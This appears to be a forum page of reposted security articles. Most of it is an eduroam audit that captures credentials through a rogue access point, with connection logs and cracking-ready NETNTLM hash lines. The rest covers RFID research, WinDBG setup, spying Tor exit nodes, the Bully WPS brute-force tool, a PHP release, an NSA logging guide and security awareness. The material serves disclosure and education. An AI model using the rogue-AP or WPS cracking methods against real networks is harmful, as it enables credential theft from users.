subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it. The certificate for the rogue access point and the CA got the following values: CA: C=DE ST=Some-State O=h4des.org CN=sqall certificate for rogue access point: C=DE ST=Some-State O=h4des.org CN=some-rogue-access-point emailAddress=sqall You can see, that the CN field got "some-rogue-access-point" as value, which is no address for a radius server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file: ca_cert="./CA.cert.pem" And what happened? wpa_supplicant connects with the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate. wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check for this CA. The device connects with the rogue access point without any problems and also discloses my user credentials. As a summary for this test: the certificate for the rogue access point just have to be a valid certificate signed by the used CA. It does not matter for which address the certificate was issued, it just have to be valid. Normally, the problem for forging a valid host in an TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is, that a CA does not sign your certificate request unless you own the domain/address (or rather the CA should not). But if you can use any address in the CN, it is no problem to get a signed certificate. Here lies the second reason for eduroam being insecure by design. I do not know if the vendor got a service to sign your own certificates with the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem to configure a rogue access point which can not be distinguished from a valid one. It should be mentioned, that the address of the radius server can be configured in the iDevice profiles. But I have no iDevice and so I can not check if the CN of the certificate provided by the radius server is checked against the configured address. In wpa_supplicant for example I did not found any configuration option for the address of the radius server. But I found the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options. Test with an own intermediate CA After an arbitrary signed certificate was tested, the next interesting thing is a certificate signed by an intermediate CA. When we look at the wpa_supplicant output when connecting to a benign access point: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] we can see, that the certificate is signed by the CA of my university (and not the "Deutsche_Telekom_Root_CA_2" CA). Actually, the chain is "Deutsche_Telekom_Root_CA_2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was, it could be difficult (and perhaps costly) to get a signed certificate by the "Deutsche_Telekom_Root_CA_2" CA, but a signed certificate by the university is very easy as student or university staff. So, I created my own intermediate CA signed by my formerly created CA and generate a new certificate for my rogue eduroam access point. The values for all these CAs and the certificate are: CA: C=DE ST=Some-State O=h4des.org CN=sqall intermediate CA: C=DE ST=Some-Other-State O=h4des.org OU=intermediate CN=it is sqall again certificate for rogue access point: C=DE ST=Some-Other-State O=h4des.org OU=intermediate certificate CN=again sqall Again, wpa_supplicant is tried first. The settings are the same as for the test before (this means wpa_supplicant uses the certificate of the CA to check the validity of the rogue access point). The output of wpa_supplicant shows, that the rogue access point offers my new certificate signed by the intermediate CA and that the client connects without any problems: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request The log file of my modified radius server shows me the MSCHAPv2 challenge-response values: mschap: Sat Jan 11 19:42:27 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 43:cd:42:0f:a6:14:46:4e response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid). As a summary for this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, it is the third reason for eduroam being insecure by design. It might be difficult to get a signed certificate by the main CA. But when intermediate CAs are in place, it could be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA and this signed the CA of my university. I think that the "DFN-Verein PCA Global - G01" intermediate CA signed a lot of university CAs. And a lot of universities (like mine) offer the service to sign your server certificate (when it is inside the namespace of the university). When you are able to get a certificate that is signed by anyone of the CAs in the chain, you can forge a valid eduroam access point. Test with a server certificate signed by my university Ok, all the talk about "uhh, it is insecure with this used public key infrastructure!" and "it is theoretically possible to ...", let's break it! I helped the university to set up some servers. So I have access to a certificate signed by the university CA. And I configured my rogue access point to use this certificate. This certificate obviously does not have "radius.ruhr-uni-bochum.de" as CN value. It is valid for other addresses which I censored out. We saw in the tests above that the value in the CN field does not matter. First I tried wpa_supplicant. Now with the settings that should be used for a valid eduroam access point. This is the output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request And we can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials: mschap: Sun Jan 12 01:24:03 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 28:f5:bf:4d:3f:fe:bf:a2 response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94 john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994 The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact that happened when I just started my rogue access point with the valid certificate: the mobile device of one of my neighbors connected instantly to my rogue access point (his or her login credentials are from a different university than mine). One has to love all the folks that have their WiFi always turned on Test with a client certificate signed by my university My university has the service to provide any student with a client certificate signed by the university's CA. My idea was "most clients do not provide options for the radius server address, perhaps they do not check if the certificate is only for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do (I did not test others). I used a certificate with this key usages and signed by my university's CA: X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment X509v3 Extended Key Usage: TLS Web Client Authentication, E-mail Protection So, when I try to connect with wpa_supplicant I get this output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication starte wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose' SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed So we can clearly see, that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4. It just tells me authentication error. To summarize this part: this does not have anything to do with the design or security of the eduroam network. This is only an implementation thing of the used client software. I just tested it with the hope to find a "fuck up" of some WiFi clients, but was disappointed Conclusion In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which is not to fix without changing the whole public key infrastructure. For me it seems that when they were designing the whole eduroam network they just thought "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet. So let us just use it too!". Using different CAs in different countries which signed a lot of intermediate CAs is not a good idea when the clients do not/can not check the address of the radius server which provides the certificate. Every certificate that is signed by one of the intermediate CAs or the used top CA is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network to which a client from a different country could also connect (for example, a client from Germany could connect to an eduroam access point when he is in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country). Or rather this is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL? The next thing is, a lot of universities (like mine) provide flawed tutorials to configure WiFi clients for eduroam. Even when MSCHAPv2 is available, the tutorials often used PAP to authenticate the client. PAP sends all user credentials in plaintext whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate. This means, when an user configured her client with the help of the flawed tutorials and uses eduroam, she could just as well shout out her credentials everytime she is connecting to the WiFi network. The really bad thing about this is, when an adversary gets the user credentials of someone, he often has the user credentials for other services of the university as well because the same account is used (in the case of my university for the email account, the MSDNAA account, ...). I heared of some universities that even use these credentials to let the student subscribe/unsubscribe for exams of the offered courses. The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute force the password when he successfully forges an eduroam access point. This means the security comes from the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ). In my opinion, the only way to really fix this issue is to use an own public key infrastruture for the whole eduroam WiFi design. When an own CA is used for eduroam (perhaps with intermediate CAs for universities to use only for certificates that are used by the eduroam infrastructure) there is no way to forge a valid eduroam access point for an attacker, because he can not get a signed certificate for it. When the clients set up the CA in their eduroam settings, they would not connect to rogue access points. Even if the client is configured to use PAP instead of MSCHAPv2, the user credentials are secure in a way. But the own public key infrastructure would only work when the clients are configured correctly and this means that the universities have to fix their tutorials for the eduroam WiFi first. I wrote my university about this issue and they fixed some tutorials (for example for Android). But not all are fixed (for example for wpa_supplicant) and I do not think that they will fix all of them. But even so, fixing the tutorials will not help when a lot of students and university staff already applied the flawed configurations. Errata In the time of writing this article, I have not tested this statement. I just based it on the settings you can made in an access point, the statement of my university and the statement my friend had made. However, yesterday night I drove to the next city to test this statement at an other university (the TU Dortmund). Honestly, I did not expect this result: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:14:a8:14:86:f1 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my university. This means that my WiFi client still connects to the radius server of my university. I did not expect that (and have not really an idea how this infrastructure works exactly). Unfortunately, I have no way to test it with an university in a foreign country. Nevertheless, my conclusion which states that an own CA should have been used for the eduroam infrastructure remains the same. Sursa: eduroam WiFi security audit or why it is broken by design - sqall's blog
  19. Near error-free wireless detection made possible Date: January 23, 2014 Source: University of Cambridge Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems. A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems. The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts. The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation. RFID is a widely-used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once. Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them. "Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment." Several other methods of improving passive RFID coverage have been developed, but they do not address the issues of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero per cent over a 20 by 15 metre area. In addition, the new system requires fewer antennas than current technologies. In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas. The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing. Sursa: Near error-free wireless detection made possible -- ScienceDaily
  20. [h=3]Getting Started with WinDBG - Part 1[/h]By Brad Antoniewicz. WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running. This is part one of a multipart series, here's our outline of whats in store: Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers Part 2 - Breakpoints Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory. [h=1]Installation[/h] Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both. [h=2]Windows 8[/h] For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK) You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The later will be the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future. From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go! [h=2]Windows 7 and Below[/h] For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer which makes future debugging efforts a heck of lot easier. That's what I'll do here. Once the installation completes, you'll should have the redistributable for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple, just copy the appropriate redistributable to the system you're debugging and then click through the installation. Articol complet: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html
  21. Who is spying on Tor network exit nodes from Russia? by paganinip on January 23rd, 2014 Researchers Winter and Lindskog identified 25 nodes of Tor network that tampered with web traffic, decrypted the traffic, or censored websites. Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior, it has been discovered that a not specified Russian entity is eavesdropping nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. On the overall nodes compromised, 19 were tampered using a man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly. Tor network anonymizes user’s web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 “exit nodes.” The study proposed is based on two fundamental considerations: User’s traffic is vulnerable at the exit nodes. For bad actors, the transit through an exit node of the traffic exposes it to eavesdrop. Very popular was the case of WikiLeaks, that was initially launched with documents intercepted from Tor network eavesdropping on Chinese hackers through a bugged exit node. Tor nodes are run by volunteers that can easily set up and taken down their servers every time they need and want. The attackers in these cases adopted a bogus digital certificate to access traffic content, for the remaining 6 cases it has been observed that impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passive eavesdropped on unencrypted web traffic on the exit nodes, by checking the digital certificates used over Tor connections against the certificates used in direct “clear-web sessions”, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers control the Russian nodes access to the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity “Main Authority.” It appears as a well-organized operation, the researchers noted that blacklisting the “Main Authority” Tor nodes, new ones using the same certificate would set-up by the same entity. It is not clear who is behind the attack, Winter and Lindskog believe that the spying operation was conducted by isolating individuals instead government agency because the technique adopted is too noisy, the attackers used a self-signed certificate that causes browser warning to Tor users. “It was actually done pretty stupidly,” says Winter. It must be also considered that Intelligence agencies, including the NSA are spending a great effort to infiltrate the Tor network, one of the documents leaked by Edward Snowden on the US surveillance expressly refers a project, codenamed Tor Stinks, to track profiles in the deep web. Despite the high interest in Tor networks and its potentialities, the network is considerably the best way to protect user’s anonymity online, and governments don’t want this. Pierluigi Paganini (Security Affairs – Tor network, Russia) Sursa: Who is spying on Tor network exit nodes from Russia?
  22. Retrieve WPA/WPA2 passphrase from a WPS enabled acess point. [h=1]OVERVIEW[/h] Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture. Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success. Source: https://github.com/bdpurcell/bully
  23. [h=1]PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB[/h] January 25th, 2014, 14:45 GMT · By Silviu Stahie - PHP logo PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1. PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more. According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking have been added. Also, support for large(>2GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available. You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia. Sursa: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB
  24. Spotting the Adversary with Windows Event Log Monitoring Author: National Security Agency/Central Security Service Contents 1 Introduction ................................................................................................................ .......................... 1 2 Deployment................................................................................................................... ........................ 1 2.1 Ensuring Integrity of Event Logs ................................................................................................................... 2 2.2 Environment Requirements ...................................................................................................... ................... 3 2.3 Log Aggregation on Windows Server 2008 R2 ............................................................................................. 4 2.4 Configuring Source Computer Policies .......................................................................................... ............... 9 2.5 Disabling Windows Remote Shell ................................................................................................ ............... 15 2.6 Firewall Modification ......................................................................................................... ........................ 15 2.7 Restricting WinRM Access ...................................................................................................... .................... 18 2.8 Disabling WinRM and Windows Collector Service ..................................................................................... 19 3 Hardening Event Collection................................................................................................... .............. 20 3.1 WinRM Authentication Hardening Methods ............................................................................................. 20 3.2 Secure Sockets Layer and WinRM .............................................................................................................. 24 4 Recommended Events to Collect ........................................................................................................ 24 4.1 Application Whitelisting ...................................................................................................... ....................... 25 4.2 Application Crashes ........................................................................................................... ......................... 25 4.3 System or Service Failures .................................................................................................... ...................... 25 4.4 Windows Update Errors ......................................................................................................... .................... 26 4.5 Windows Firewall .............................................................................................................. ......................... 26 4.6 Clearing Event Logs ........................................................................................................... ......................... 26 4.7 Software and Service Installation ............................................................................................. .................. 27 4.8 Account Usage ................................................................................................................. .......................... 27 4.9 Kernel Driver Signing ......................................................................................................... ......................... 28 4.10 Group Policy Errors ........................................................................................................... ......................... 29 4.11 Windows Defender Activities ..................................................................................................................... 29 4.12 Mobile Device Activities ...................................................................................................... ....................... 30 4.13 External Media Detection ...................................................................................................... .................... 31 4.14 Printing Services ............................................................................................................. ............................ 32 4.15 Pass the Hash Detection........................................................................................................ ..................... 32 4.16 Remote Desktop Logon Detection ................................................................................................ ............. 33 5 Event Log Retention ......................................................................................................... ................... 34 6 Final Recommendations........................................................................................................ .............. 35 7 Appendix .................................................................................................................... ......................... 35 7.1 Subscriptions ................................................................................................................. ............................. 35 7.2 Event ID Definitions .......................................................................................................... .......................... 37 7.3 Windows Remote Management Versions.................................................................................................. 38 7.4 WinRM 2.0 Configuration Settings ............................................................................................................. 40 7.5 WinRM Registry Keys and Values ................................................................................................ ............... 43 7.6 Troubleshooting ............................................................................................................... .......................... 44 8 Works Cited ................................................................................................................. ........................ 48 Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf
  25. Improving the Human Firewall Introduction Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide – it is pointless to expend millions of dollars on the most recent software and hardware to defend the corporate networks against all kinds of internal and external threats only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: “A chain is only as strong as its weakest link” and it is tightly related to information security as attackers test all possible points of access for vulnerabilities and usually choose the least resistant one. A report from Wisegate, a peer-based IT knowledge service, states that the threat from inner computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claim that user security awareness was a top concern in 2013. Most companies already do training and have a relatively high expenditure on computer-based training programs. These trainings just do not prove as efficient as they are planned to be. The key issue here is to differentiate between training and education – training employees involves actions while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results on the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that it permits them to act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program. This cannot be achieved merely by conducting training, leaving notes and hanging up posters. Isn’t the average Internet user already aware of the security issues that he might be confronted with? To illustrate our point, we looked at the trends in Google search for the following keywords: The following results were shown: The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the word social engineering for most periods due to its low demand. We see from the red and purple curve above that between 2004 and 2007 many Internet users demanded keygens and torrents to get illegal access to paid software (at a generally declining rate) but their awareness of possible implications of keygens such as malware and social engineering remained relatively stagnant. From year 2008 up to now we see a slight increase in the search tendency for malware and phishing while the query tendency for keygen and torrents have been falling at an increasing rate and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet. Nonetheless, this decline of piracy and risky behavior is also due to other reasons such as better enforcement of copyright laws, removal of access to websites with illegal contents by ISPs, closure of online businesses operating in the grey market by governments, inter alia. However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as demanded a keyword as virus and more demanded than keygen, torrents, social engineering, phishing, malware. It appears that the end-users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords virus and anti-virus are more trending than torrents and multiple times more popular than social engineering, phishing and malware which pinpoints the low safety precautionms of the average Internet user as responsibilities for Web safety appear to end with installing anti-virus software and ignoring the safe use of the Internet. Related queries for “virus” appear to be “anti virus”, “virus download”, “antivirus”, “virus scan”, “free anti virus”, “avg”, “avg virus”, “virus removal”, “virus protection”, among others which show the overall direction of the users’ input in terms of the keyword “virus”. We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever pinpointing the need for ameliorating the current security awareness programs that companies undertake. If I have to educate and not train, what should I change? Firstly, you should start by organizing group lunches with a security-oriented purpose. Each employee would appreciate a good lunch and/or dessert so the attendance of such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures but by resorting to overall participation and group-wide discussion instead. In these lunches, you can begin to sort out 